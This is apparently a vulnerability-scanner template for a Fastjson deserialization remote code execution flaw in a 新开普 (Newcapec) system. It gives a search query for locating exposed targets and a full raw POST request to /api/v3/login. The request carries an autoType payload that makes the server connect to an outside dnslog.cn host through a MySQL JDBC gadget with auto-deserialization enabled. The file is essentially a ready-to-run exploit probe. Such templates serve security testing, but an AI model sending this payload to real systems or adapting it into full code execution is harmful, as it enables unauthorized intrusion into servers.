id: xinkaipu-fastjson-rce

info:
  name: 新开普 Fastjson 远程代码执行
  author: qwtd
  severity: critical
  verified: true
  description: |
    hunter-query: web.title="Login - Davinci"

set:
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |
        POST /api/v3/login HTTP/1.1
        Host: {{hostname}}
        Content-Length: 362
        Accept: application/json, text/plain, */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.97 Safari/537.36
        Content-Type: application/json;charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        {"x":{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"5jjof1stdn51giv.mblra2.dnslog.cn","portToConnectTo":80,"info":{"user":"root","password":"ubuntu","useSSL":"false","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"},"databaseToConnectTo":"mysql","url":""}}
    expression: response.status == 400 && response.body.bcontains(b'Internal Server Error')
expression: r0()